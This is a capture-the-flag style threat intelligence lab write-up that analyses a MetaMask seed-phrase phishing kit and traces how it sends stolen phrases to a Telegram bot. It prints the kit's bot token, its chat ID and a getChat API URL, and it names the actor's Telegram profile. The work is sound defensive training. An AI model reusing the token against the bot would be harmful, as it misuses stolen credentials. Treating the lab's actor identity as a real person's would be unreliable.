GrabThePhisher Lab
Lab category: Threat Intel
Lab can be found here.
For this lab we were given the following scenario:
A decentralized finance (DeFi) platform recently reported multiple user complaints about unauthorized fund withdrawals. A forensic review uncovered a phishing site impersonating the legitimate PancakeSwap exchange, luring victims into entering their wallet seed phrases. The phishing kit was hosted on a compromised server and exfiltrated credentials via a Telegram bot.
Your task is to conduct threat intelligence analysis on the phishing infrastructure, identify indicators of compromise (IoCs), and track the attacker’s online presence, including aliases and Telegram identifiers, to understand their tactics, techniques, and procedures (TTPs).
1. Which wallet is used for asking the seed phrase?
In the 'pankewk' directory; we can see a directory that does not match the other. Thus 'metamask' is the answer.
2. What is the file name that has the code for the phishing kit?
Since we are talking about the 'metamask' wallet, we will enter that directory. In which we can find the 'metamask.php' file.
3. In which language was the kit written?
Based on the file found above, the language is 'php'
4. What service does the kit use to retrieve the victim's machine information?
In the php file that we found we can see what api calls are made. One to telegram and one to 'sypex geo'. Since the telegram one is for sending a message, our answer it 'sypex geo'.
5. How many seed phrases were already collected?
In the php file we can also see that we are writting to the 'log.txt' file inside the 'log' directory. When opening the 'log.txt' file we can see 3 lines of seed phrases. Thus the answer is '3'.
6. Could you please provide the seed phrase associated with the most recent phishing incident?
For this we simple need to provide the last row of the 'log.txt' file of the previous question.
7. Which medium was used for credential dumping?
As we mentioned in question 4 there is a second send message api call to Telegram. Thus the answer is 'Telegram'
https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564
8. What is the token for accessing the channel?
In the php file inside the sendTel() function we can see a variable named 'token' that contains the token whose value is '5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10'.
9. What is the Chat ID for the phisher's channel?
Again, as above, in the php file in the sendTel() function we can find a variable name 'id' that has the channel id whose value is '5442785564'.
10. What are the allies of the phish kit developer?
In the php file in the comented section near the top we can see the developer signing off the message with ' Regards, j1j1b1s@m3r0' which means that 'j1j1b1s@m3r0'' is the allies name
The following solutions were found using this GET request to telegram's service and reading the appropriate fields of the JSON responce,
{
"ok": true,
"result": {
"id": 5442785564,
"first_name": "Marcus",
"last_name": "Aurelius",
"username": "pumpkinboii",
"type": "private",
"can_send_gift": true,
"active_usernames": [
"pumpkinboii"
],
"accepted_gift_types": {
"unlimited_gifts": true,
"limited_gifts": true,
"unique_gifts": true,
"premium_subscription": true
},
"max_reaction_count": 11,
"accent_color_id": 6
}
}11. What is the full name of the Phish Actor?
From the above API response we find that the name is "Marcus Aurelius"
12. What is the username of the Phish Actor
From the above API response we find that the username is "pumpkinboii"